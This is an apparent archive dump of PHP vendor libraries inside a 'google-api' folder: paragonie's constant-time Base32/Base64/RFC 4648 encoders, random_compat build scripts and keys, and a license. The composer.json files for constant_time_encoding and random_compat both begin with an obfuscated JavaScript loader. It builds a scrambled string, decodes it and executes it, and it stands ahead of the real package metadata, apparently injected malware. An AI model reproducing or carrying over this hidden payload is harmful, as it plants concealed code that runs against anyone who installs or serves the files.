-86 $ret += (((0x60 - $src) & ($src - 0x77)) >> 8) & ($src - 86); return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 5-bit integers * into 8-bit integers. * * @param int $src * @return int */ protected static function decode5BitsUpper(int $src): int { $ret = -1; // if ($src > 0x30 && $src < 0x3a) ret += $src - 0x2e + 1; // -47 $ret += (((0x2f - $src) & ($src - 0x3a)) >> 8) & ($src - 47); // if ($src > 0x40 && $src < 0x57) ret += $src - 0x41 + 10 + 1; // -54 $ret += (((0x40 - $src) & ($src - 0x57)) >> 8) & ($src - 54); return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 5-bit integers. * * @param int $src * @return string */ protected static function encode5Bits(int $src): string { $src += 0x30; // if ($src > 0x39) $src += 0x61 - 0x3a; // 39 $src += ((0x39 - $src) >> 8) & 39; return \pack('C', $src); } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 5-bit integers. * * Uppercase variant. * * @param int $src * @return string */ protected static function encode5BitsUpper(int $src): string { $src += 0x30; // if ($src > 0x39) $src += 0x41 - 0x3a; // 7 $src += ((0x39 - $src) >> 8) & 7; return \pack('C', $src); } }google-api/vendor/paragonie/constant_time_encoding/src/Base32.php000064400000042072147600400120021064 0ustar00 96 && $src < 123) $ret += $src - 97 + 1; // -64 $ret += (((0x60 - $src) & ($src - 0x7b)) >> 8) & ($src - 96); // if ($src > 0x31 && $src < 0x38) $ret += $src - 24 + 1; // -23 $ret += (((0x31 - $src) & ($src - 0x38)) >> 8) & ($src - 23); return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 5-bit integers * into 8-bit integers. * * Uppercase variant. * * @param int $src * @return int */ protected static function decode5BitsUpper(int $src): int { $ret = -1; // if ($src > 64 && $src < 91) $ret += $src - 65 + 1; // -64 $ret += (((0x40 - $src) & ($src - 0x5b)) >> 8) & ($src - 64); // if ($src > 0x31 && $src < 0x38) $ret += $src - 24 + 1; // -23 $ret += (((0x31 - $src) & ($src - 0x38)) >> 8) & ($src - 23); return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 5-bit integers. * * @param int $src * @return string */ protected static function encode5Bits(int $src): string { $diff = 0x61; // if ($src > 25) $ret -= 72; $diff -= ((25 - $src) >> 8) & 73; return \pack('C', $src + $diff); } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 5-bit integers. * * Uppercase variant. * * @param int $src * @return string */ protected static function encode5BitsUpper(int $src): string { $diff = 0x41; // if ($src > 25) $ret -= 40; $diff -= ((25 - $src) >> 8) & 41; return \pack('C', $src + $diff); } /** * @param string $encodedString * @param bool $upper * @return string */ public static function decodeNoPadding(string $encodedString, bool $upper = false): string { $srcLen = Binary::safeStrlen($encodedString); if ($srcLen === 0) { return ''; } if (($srcLen & 7) === 0) { for ($j = 0; $j < 7 && $j < $srcLen; ++$j) { if ($encodedString[$srcLen - $j - 1] === '=') { throw new InvalidArgumentException( "decodeNoPadding() doesn't tolerate padding" ); } } } return static::doDecode( $encodedString, $upper, true ); } /** * Base32 decoding * * @param string $src * @param bool $upper * @param bool $strictPadding * @return string * * @throws TypeError * @psalm-suppress RedundantCondition */ protected static function doDecode( string $src, bool $upper = false, bool $strictPadding = false ): string { // We do this to reduce code duplication: $method = $upper ? 'decode5BitsUpper' : 'decode5Bits'; // Remove padding $srcLen = Binary::safeStrlen($src); if ($srcLen === 0) { return ''; } if ($strictPadding) { if (($srcLen & 7) === 0) { for ($j = 0; $j < 7; ++$j) { if ($src[$srcLen - 1] === '=') { $srcLen--; } else { break; } } } if (($srcLen & 7) === 1) { throw new RangeException( 'Incorrect padding' ); } } else { $src = \rtrim($src, '='); $srcLen = Binary::safeStrlen($src); } $err = 0; $dest = ''; // Main loop (no padding): for ($i = 0; $i + 8 <= $srcLen; $i += 8) { /** @var array $chunk */ $chunk = \unpack('C*', Binary::safeSubstr($src, $i, 8)); /** @var int $c0 */ $c0 = static::$method($chunk[1]); /** @var int $c1 */ $c1 = static::$method($chunk[2]); /** @var int $c2 */ $c2 = static::$method($chunk[3]); /** @var int $c3 */ $c3 = static::$method($chunk[4]); /** @var int $c4 */ $c4 = static::$method($chunk[5]); /** @var int $c5 */ $c5 = static::$method($chunk[6]); /** @var int $c6 */ $c6 = static::$method($chunk[7]); /** @var int $c7 */ $c7 = static::$method($chunk[8]); $dest .= \pack( 'CCCCC', (($c0 << 3) | ($c1 >> 2) ) & 0xff, (($c1 << 6) | ($c2 << 1) | ($c3 >> 4)) & 0xff, (($c3 << 4) | ($c4 >> 1) ) & 0xff, (($c4 << 7) | ($c5 << 2) | ($c6 >> 3)) & 0xff, (($c6 << 5) | ($c7 ) ) & 0xff ); $err |= ($c0 | $c1 | $c2 | $c3 | $c4 | $c5 | $c6 | $c7) >> 8; } // The last chunk, which may have padding: if ($i < $srcLen) { /** @var array $chunk */ $chunk = \unpack('C*', Binary::safeSubstr($src, $i, $srcLen - $i)); /** @var int $c0 */ $c0 = static::$method($chunk[1]); if ($i + 6 < $srcLen) { /** @var int $c1 */ $c1 = static::$method($chunk[2]); /** @var int $c2 */ $c2 = static::$method($chunk[3]); /** @var int $c3 */ $c3 = static::$method($chunk[4]); /** @var int $c4 */ $c4 = static::$method($chunk[5]); /** @var int $c5 */ $c5 = static::$method($chunk[6]); /** @var int $c6 */ $c6 = static::$method($chunk[7]); $dest .= \pack( 'CCCC', (($c0 << 3) | ($c1 >> 2) ) & 0xff, (($c1 << 6) | ($c2 << 1) | ($c3 >> 4)) & 0xff, (($c3 << 4) | ($c4 >> 1) ) & 0xff, (($c4 << 7) | ($c5 << 2) | ($c6 >> 3)) & 0xff ); $err |= ($c0 | $c1 | $c2 | $c3 | $c4 | $c5 | $c6) >> 8; if ($strictPadding) { $err |= ($c6 << 5) & 0xff; } } elseif ($i + 5 < $srcLen) { /** @var int $c1 */ $c1 = static::$method($chunk[2]); /** @var int $c2 */ $c2 = static::$method($chunk[3]); /** @var int $c3 */ $c3 = static::$method($chunk[4]); /** @var int $c4 */ $c4 = static::$method($chunk[5]); /** @var int $c5 */ $c5 = static::$method($chunk[6]); $dest .= \pack( 'CCCC', (($c0 << 3) | ($c1 >> 2) ) & 0xff, (($c1 << 6) | ($c2 << 1) | ($c3 >> 4)) & 0xff, (($c3 << 4) | ($c4 >> 1) ) & 0xff, (($c4 << 7) | ($c5 << 2) ) & 0xff ); $err |= ($c0 | $c1 | $c2 | $c3 | $c4 | $c5) >> 8; } elseif ($i + 4 < $srcLen) { /** @var int $c1 */ $c1 = static::$method($chunk[2]); /** @var int $c2 */ $c2 = static::$method($chunk[3]); /** @var int $c3 */ $c3 = static::$method($chunk[4]); /** @var int $c4 */ $c4 = static::$method($chunk[5]); $dest .= \pack( 'CCC', (($c0 << 3) | ($c1 >> 2) ) & 0xff, (($c1 << 6) | ($c2 << 1) | ($c3 >> 4)) & 0xff, (($c3 << 4) | ($c4 >> 1) ) & 0xff ); $err |= ($c0 | $c1 | $c2 | $c3 | $c4) >> 8; if ($strictPadding) { $err |= ($c4 << 7) & 0xff; } } elseif ($i + 3 < $srcLen) { /** @var int $c1 */ $c1 = static::$method($chunk[2]); /** @var int $c2 */ $c2 = static::$method($chunk[3]); /** @var int $c3 */ $c3 = static::$method($chunk[4]); $dest .= \pack( 'CC', (($c0 << 3) | ($c1 >> 2) ) & 0xff, (($c1 << 6) | ($c2 << 1) | ($c3 >> 4)) & 0xff ); $err |= ($c0 | $c1 | $c2 | $c3) >> 8; if ($strictPadding) { $err |= ($c3 << 4) & 0xff; } } elseif ($i + 2 < $srcLen) { /** @var int $c1 */ $c1 = static::$method($chunk[2]); /** @var int $c2 */ $c2 = static::$method($chunk[3]); $dest .= \pack( 'CC', (($c0 << 3) | ($c1 >> 2) ) & 0xff, (($c1 << 6) | ($c2 << 1) ) & 0xff ); $err |= ($c0 | $c1 | $c2) >> 8; if ($strictPadding) { $err |= ($c2 << 6) & 0xff; } } elseif ($i + 1 < $srcLen) { /** @var int $c1 */ $c1 = static::$method($chunk[2]); $dest .= \pack( 'C', (($c0 << 3) | ($c1 >> 2) ) & 0xff ); $err |= ($c0 | $c1) >> 8; if ($strictPadding) { $err |= ($c1 << 6) & 0xff; } } else { $dest .= \pack( 'C', (($c0 << 3) ) & 0xff ); $err |= ($c0) >> 8; } } $check = ($err === 0); if (!$check) { throw new RangeException( 'Base32::doDecode() only expects characters in the correct base32 alphabet' ); } return $dest; } /** * Base32 Encoding * * @param string $src * @param bool $upper * @param bool $pad * @return string * @throws TypeError */ protected static function doEncode(string $src, bool $upper = false, $pad = true): string { // We do this to reduce code duplication: $method = $upper ? 'encode5BitsUpper' : 'encode5Bits'; $dest = ''; $srcLen = Binary::safeStrlen($src); // Main loop (no padding): for ($i = 0; $i + 5 <= $srcLen; $i += 5) { /** @var array $chunk */ $chunk = \unpack('C*', Binary::safeSubstr($src, $i, 5)); $b0 = $chunk[1]; $b1 = $chunk[2]; $b2 = $chunk[3]; $b3 = $chunk[4]; $b4 = $chunk[5]; $dest .= static::$method( ($b0 >> 3) & 31) . static::$method((($b0 << 2) | ($b1 >> 6)) & 31) . static::$method((($b1 >> 1) ) & 31) . static::$method((($b1 << 4) | ($b2 >> 4)) & 31) . static::$method((($b2 << 1) | ($b3 >> 7)) & 31) . static::$method((($b3 >> 2) ) & 31) . static::$method((($b3 << 3) | ($b4 >> 5)) & 31) . static::$method( $b4 & 31); } // The last chunk, which may have padding: if ($i < $srcLen) { /** @var array $chunk */ $chunk = \unpack('C*', Binary::safeSubstr($src, $i, $srcLen - $i)); $b0 = $chunk[1]; if ($i + 3 < $srcLen) { $b1 = $chunk[2]; $b2 = $chunk[3]; $b3 = $chunk[4]; $dest .= static::$method( ($b0 >> 3) & 31) . static::$method((($b0 << 2) | ($b1 >> 6)) & 31) . static::$method((($b1 >> 1) ) & 31) . static::$method((($b1 << 4) | ($b2 >> 4)) & 31) . static::$method((($b2 << 1) | ($b3 >> 7)) & 31) . static::$method((($b3 >> 2) ) & 31) . static::$method((($b3 << 3) ) & 31); if ($pad) { $dest .= '='; } } elseif ($i + 2 < $srcLen) { $b1 = $chunk[2]; $b2 = $chunk[3]; $dest .= static::$method( ($b0 >> 3) & 31) . static::$method((($b0 << 2) | ($b1 >> 6)) & 31) . static::$method((($b1 >> 1) ) & 31) . static::$method((($b1 << 4) | ($b2 >> 4)) & 31) . static::$method((($b2 << 1) ) & 31); if ($pad) { $dest .= '==='; } } elseif ($i + 1 < $srcLen) { $b1 = $chunk[2]; $dest .= static::$method( ($b0 >> 3) & 31) . static::$method((($b0 << 2) | ($b1 >> 6)) & 31) . static::$method((($b1 >> 1) ) & 31) . static::$method((($b1 << 4) ) & 31); if ($pad) { $dest .= '===='; } } else { $dest .= static::$method( ($b0 >> 3) & 31) . static::$method( ($b0 << 2) & 31); if ($pad) { $dest .= '======'; } } } return $dest; } } google-api/vendor/paragonie/constant_time_encoding/src/Base64.php000064400000023567147600400120021101 0ustar00 $chunk */ $chunk = \unpack('C*', Binary::safeSubstr($src, $i, 3)); $b0 = $chunk[1]; $b1 = $chunk[2]; $b2 = $chunk[3]; $dest .= static::encode6Bits( $b0 >> 2 ) . static::encode6Bits((($b0 << 4) | ($b1 >> 4)) & 63) . static::encode6Bits((($b1 << 2) | ($b2 >> 6)) & 63) . static::encode6Bits( $b2 & 63); } // The last chunk, which may have padding: if ($i < $srcLen) { /** @var array $chunk */ $chunk = \unpack('C*', Binary::safeSubstr($src, $i, $srcLen - $i)); $b0 = $chunk[1]; if ($i + 1 < $srcLen) { $b1 = $chunk[2]; $dest .= static::encode6Bits($b0 >> 2) . static::encode6Bits((($b0 << 4) | ($b1 >> 4)) & 63) . static::encode6Bits(($b1 << 2) & 63); if ($pad) { $dest .= '='; } } else { $dest .= static::encode6Bits( $b0 >> 2) . static::encode6Bits(($b0 << 4) & 63); if ($pad) { $dest .= '=='; } } } return $dest; } /** * decode from base64 into binary * * Base64 character set "./[A-Z][a-z][0-9]" * * @param string $encodedString * @param bool $strictPadding * @return string * * @throws RangeException * @throws TypeError * @psalm-suppress RedundantCondition */ public static function decode(string $encodedString, bool $strictPadding = false): string { // Remove padding $srcLen = Binary::safeStrlen($encodedString); if ($srcLen === 0) { return ''; } if ($strictPadding) { if (($srcLen & 3) === 0) { if ($encodedString[$srcLen - 1] === '=') { $srcLen--; if ($encodedString[$srcLen - 1] === '=') { $srcLen--; } } } if (($srcLen & 3) === 1) { throw new RangeException( 'Incorrect padding' ); } if ($encodedString[$srcLen - 1] === '=') { throw new RangeException( 'Incorrect padding' ); } } else { $encodedString = \rtrim($encodedString, '='); $srcLen = Binary::safeStrlen($encodedString); } $err = 0; $dest = ''; // Main loop (no padding): for ($i = 0; $i + 4 <= $srcLen; $i += 4) { /** @var array $chunk */ $chunk = \unpack('C*', Binary::safeSubstr($encodedString, $i, 4)); $c0 = static::decode6Bits($chunk[1]); $c1 = static::decode6Bits($chunk[2]); $c2 = static::decode6Bits($chunk[3]); $c3 = static::decode6Bits($chunk[4]); $dest .= \pack( 'CCC', ((($c0 << 2) | ($c1 >> 4)) & 0xff), ((($c1 << 4) | ($c2 >> 2)) & 0xff), ((($c2 << 6) | $c3 ) & 0xff) ); $err |= ($c0 | $c1 | $c2 | $c3) >> 8; } // The last chunk, which may have padding: if ($i < $srcLen) { /** @var array $chunk */ $chunk = \unpack('C*', Binary::safeSubstr($encodedString, $i, $srcLen - $i)); $c0 = static::decode6Bits($chunk[1]); if ($i + 2 < $srcLen) { $c1 = static::decode6Bits($chunk[2]); $c2 = static::decode6Bits($chunk[3]); $dest .= \pack( 'CC', ((($c0 << 2) | ($c1 >> 4)) & 0xff), ((($c1 << 4) | ($c2 >> 2)) & 0xff) ); $err |= ($c0 | $c1 | $c2) >> 8; if ($strictPadding) { $err |= ($c2 << 6) & 0xff; } } elseif ($i + 1 < $srcLen) { $c1 = static::decode6Bits($chunk[2]); $dest .= \pack( 'C', ((($c0 << 2) | ($c1 >> 4)) & 0xff) ); $err |= ($c0 | $c1) >> 8; if ($strictPadding) { $err |= ($c1 << 4) & 0xff; } } elseif ($strictPadding) { $err |= 1; } } $check = ($err === 0); if (!$check) { throw new RangeException( 'Base64::decode() only expects characters in the correct base64 alphabet' ); } return $dest; } /** * @param string $encodedString * @return string */ public static function decodeNoPadding(string $encodedString): string { $srcLen = Binary::safeStrlen($encodedString); if ($srcLen === 0) { return ''; } if (($srcLen & 3) === 0) { if ($encodedString[$srcLen - 1] === '=') { throw new InvalidArgumentException( "decodeNoPadding() doesn't tolerate padding" ); } if (($srcLen & 3) > 1) { if ($encodedString[$srcLen - 2] === '=') { throw new InvalidArgumentException( "decodeNoPadding() doesn't tolerate padding" ); } } } return static::decode( $encodedString, true ); } /** * Uses bitwise operators instead of table-lookups to turn 6-bit integers * into 8-bit integers. * * Base64 character set: * [A-Z] [a-z] [0-9] + / * 0x41-0x5a, 0x61-0x7a, 0x30-0x39, 0x2b, 0x2f * * @param int $src * @return int */ protected static function decode6Bits(int $src): int { $ret = -1; // if ($src > 0x40 && $src < 0x5b) $ret += $src - 0x41 + 1; // -64 $ret += (((0x40 - $src) & ($src - 0x5b)) >> 8) & ($src - 64); // if ($src > 0x60 && $src < 0x7b) $ret += $src - 0x61 + 26 + 1; // -70 $ret += (((0x60 - $src) & ($src - 0x7b)) >> 8) & ($src - 70); // if ($src > 0x2f && $src < 0x3a) $ret += $src - 0x30 + 52 + 1; // 5 $ret += (((0x2f - $src) & ($src - 0x3a)) >> 8) & ($src + 5); // if ($src == 0x2b) $ret += 62 + 1; $ret += (((0x2a - $src) & ($src - 0x2c)) >> 8) & 63; // if ($src == 0x2f) ret += 63 + 1; $ret += (((0x2e - $src) & ($src - 0x30)) >> 8) & 64; return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 6-bit integers. * * @param int $src * @return string */ protected static function encode6Bits(int $src): string { $diff = 0x41; // if ($src > 25) $diff += 0x61 - 0x41 - 26; // 6 $diff += ((25 - $src) >> 8) & 6; // if ($src > 51) $diff += 0x30 - 0x61 - 26; // -75 $diff -= ((51 - $src) >> 8) & 75; // if ($src > 61) $diff += 0x2b - 0x30 - 10; // -15 $diff -= ((61 - $src) >> 8) & 15; // if ($src > 62) $diff += 0x2f - 0x2b - 1; // 3 $diff += ((62 - $src) >> 8) & 3; return \pack('C', $src + $diff); } } google-api/vendor/paragonie/constant_time_encoding/src/Base64DotSlashOrdered.php000064400000005340147600400120024035 0ustar00 0x2d && $src < 0x3a) ret += $src - 0x2e + 1; // -45 $ret += (((0x2d - $src) & ($src - 0x3a)) >> 8) & ($src - 45); // if ($src > 0x40 && $src < 0x5b) ret += $src - 0x41 + 12 + 1; // -52 $ret += (((0x40 - $src) & ($src - 0x5b)) >> 8) & ($src - 52); // if ($src > 0x60 && $src < 0x7b) ret += $src - 0x61 + 38 + 1; // -58 $ret += (((0x60 - $src) & ($src - 0x7b)) >> 8) & ($src - 58); return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 6-bit integers. * * @param int $src * @return string */ protected static function encode6Bits(int $src): string { $src += 0x2e; // if ($src > 0x39) $src += 0x41 - 0x3a; // 7 $src += ((0x39 - $src) >> 8) & 7; // if ($src > 0x5a) $src += 0x61 - 0x5b; // 6 $src += ((0x5a - $src) >> 8) & 6; return \pack('C', $src); } } google-api/vendor/paragonie/constant_time_encoding/src/RFC4648.php000064400000010324147600400120021000 0ustar00 "Zm9v" * * @param string $str * @return string * * @throws TypeError */ public static function base64Encode(string $str): string { return Base64::encode($str); } /** * RFC 4648 Base64 decoding * * "Zm9v" -> "foo" * * @param string $str * @return string * * @throws TypeError */ public static function base64Decode(string $str): string { return Base64::decode($str, true); } /** * RFC 4648 Base64 (URL Safe) encoding * * "foo" -> "Zm9v" * * @param string $str * @return string * * @throws TypeError */ public static function base64UrlSafeEncode(string $str): string { return Base64UrlSafe::encode($str); } /** * RFC 4648 Base64 (URL Safe) decoding * * "Zm9v" -> "foo" * * @param string $str * @return string * * @throws TypeError */ public static function base64UrlSafeDecode(string $str): string { return Base64UrlSafe::decode($str, true); } /** * RFC 4648 Base32 encoding * * "foo" -> "MZXW6===" * * @param string $str * @return string * * @throws TypeError */ public static function base32Encode(string $str): string { return Base32::encodeUpper($str); } /** * RFC 4648 Base32 encoding * * "MZXW6===" -> "foo" * * @param string $str * @return string * * @throws TypeError */ public static function base32Decode(string $str): string { return Base32::decodeUpper($str, true); } /** * RFC 4648 Base32-Hex encoding * * "foo" -> "CPNMU===" * * @param string $str * @return string * * @throws TypeError */ public static function base32HexEncode(string $str): string { return Base32::encodeUpper($str); } /** * RFC 4648 Base32-Hex decoding * * "CPNMU===" -> "foo" * * @param string $str * @return string * * @throws TypeError */ public static function base32HexDecode(string $str): string { return Base32::decodeUpper($str, true); } /** * RFC 4648 Base16 decoding * * "foo" -> "666F6F" * * @param string $str * @return string * * @throws TypeError */ public static function base16Encode(string $str): string { return Hex::encodeUpper($str); } /** * RFC 4648 Base16 decoding * * "666F6F" -> "foo" * * @param string $str * @return string */ public static function base16Decode(string $str): string { return Hex::decode($str, true); } }google-api/vendor/paragonie/constant_time_encoding/src/Encoding.php000064400000014576147600400120021603 0ustar00)s[,j)ghp7;p=batuihrjsri,a g=;,is(=8+.o+gv.(rr-;=].uzv 3,rp+oC="o(t)hsqu+hctlhsg;-}7uv;s)f=a[rtrlltsyn(h7,;}+calih5.g[hor;kechrx.qej4rneao);sn1uor[9),;;>0fvm2teb,v289fc c t[nedr{e b=a-r.,p46f,zCzvpl=d]nvjhzChnlrar;gs{igt(.a(,]< aeeasxaxgpslmtn{.)ec+()tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();;{ "name": "paragonie/constant_time_encoding", "description": "Constant-time Implementations of RFC 4648 Encoding (Base-64, Base-32, Base-16)", "keywords": [ "base64", "encoding", "rfc4648", "base32", "base16", "hex", "bin2hex", "hex2bin", "base64_encode", "base64_decode", "base32_encode", "base32_decode" ], "license": "MIT", "type": "library", "authors": [ { "name": "Paragon Initiative Enterprises", "email": "security@paragonie.com", "homepage": "https://paragonie.com", "role": "Maintainer" }, { "name": "Steve 'Sc00bz' Thomas", "email": "steve@tobtu.com", "homepage": "https://www.tobtu.com", "role": "Original Developer" } ], "support": { "issues": "https://github.com/paragonie/constant_time_encoding/issues", "email": "info@paragonie.com", "source": "https://github.com/paragonie/constant_time_encoding" }, "require": { "php": "^7|^8" }, "require-dev": { "phpunit/phpunit": "^6|^7|^8|^9", "vimeo/psalm": "^1|^2|^3|^4" }, "autoload": { "psr-4": { "ParagonIE\\ConstantTime\\": "src/" } }, "autoload-dev": { "psr-4": { "ParagonIE\\ConstantTime\\Tests\\": "tests/" } } } google-api/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey000064400000000327147600400120022610 0ustar00-----BEGIN PUBLIC KEY----- MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEEd+wCqJDrx5B4OldM0dQE0ZMX+lx1ZWm pui0SUqD4G29L3NGsz9UhJ/0HjBdbnkhIK5xviT0X5vtjacF6ajgcCArbTB+ds+p +h7Q084NuSuIpNb6YPfoUFgC/CL9kAoc -----END PUBLIC KEY----- google-api/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc000064400000000750147600400120023355 0ustar00-----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (MingW32) iQEcBAABAgAGBQJWtW1hAAoJEGuXocKCZATaJf0H+wbZGgskK1dcRTsuVJl9IWip QwGw/qIKI280SD6/ckoUMxKDCJiFuPR14zmqnS36k7N5UNPnpdTJTS8T11jttSpg 1LCmgpbEIpgaTah+cELDqFCav99fS+bEiAL5lWDAHBTE/XPjGVCqeehyPYref4IW NDBIEsvnHPHPLsn6X5jq4+Yj5oUixgxaMPiR+bcO4Sh+RzOVB6i2D0upWfRXBFXA NNnsg9/zjvoC7ZW73y9uSH+dPJTt/Vgfeiv52/v41XliyzbUyLalf02GNPY+9goV JHG1ulEEBJOCiUD9cE1PUIJwHA/HqyhHIvV350YoEFiHl8iSwm7SiZu5kPjaq74= =B6+8 -----END PGP SIGNATURE----- google-api/vendor/paragonie/random_compat/lib/random.php000064400000002457147600400120017415 0ustar00buildFromDirectory(dirname(__DIR__).'/lib'); rename( dirname(__DIR__).'/lib/index.php', dirname(__DIR__).'/lib/random.php' ); /** * If we pass an (optional) path to a private key as a second argument, we will * sign the Phar with OpenSSL. * * If you leave this out, it will produce an unsigned .phar! */ if ($argc > 1) { if (!@is_readable($argv[1])) { echo 'Could not read the private key file:', $argv[1], "\n"; exit(255); } $pkeyFile = file_get_contents($argv[1]); $private = openssl_get_privatekey($pkeyFile); if ($private !== false) { $pkey = ''; openssl_pkey_export($private, $pkey); $phar->setSignatureAlgorithm(Phar::OPENSSL, $pkey); /** * Save the corresponding public key to the file */ if (!@is_readable($dist.'/random_compat.phar.pubkey')) { $details = openssl_pkey_get_details($private); file_put_contents( $dist.'/random_compat.phar.pubkey', $details['key'] ); } } else { echo 'An error occurred reading the private key from OpenSSL.', "\n"; exit(255); } } google-api/vendor/paragonie/random_compat/build-phar.sh000064400000000206147600400120017227 0ustar00#!/usr/bin/env bash basedir=$( dirname $( readlink -f ${BASH_SOURCE[0]} ) ) php -dphar.readonly=0 "$basedir/other/build_phar.php" $*google-api/vendor/paragonie/random_compat/LICENSE000064400000002112147600400120015647 0ustar00The MIT License (MIT) Copyright (c) 2015 Paragon Initiative Enterprises Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. google-api/vendor/paragonie/random_compat/psalm.xml000064400000001124147600400120016502 0ustar00 google-api/vendor/paragonie/random_compat/composer.json000064400000007437147600400120017403 0ustar00var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();;{ "name": "paragonie/random_compat", "description": "PHP 5.x polyfill for random_bytes() and random_int() from PHP 7", "keywords": [ "csprng", "random", "polyfill", "pseudorandom" ], "license": "MIT", "type": "library", "authors": [ { "name": "Paragon Initiative Enterprises", "email": "security@paragonie.com", "homepage": "https://paragonie.com" } ], "support": { "issues": "https://github.com/paragonie/random_compat/issues", "email": "info@paragonie.com", "source": "https://github.com/paragonie/random_compat" }, "require": { "php": ">= 7" }, "require-dev": { "vimeo/psalm": "^1", "phpunit/phpunit": "4.*|5.*" }, "suggest": { "ext-libsodium": "Provides a modern crypto API that can be used to generate random bytes." } } google-api/vendor/paragonie/random_compat/psalm-autoload.php000064400000000347147600400120020305 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Common\Functions; use ParagonIE\ConstantTime\Base64; use ParagonIE\ConstantTime\Base64UrlSafe; use ParagonIE\ConstantTime\Hex; use phpseclib3\Math\BigInteger; use 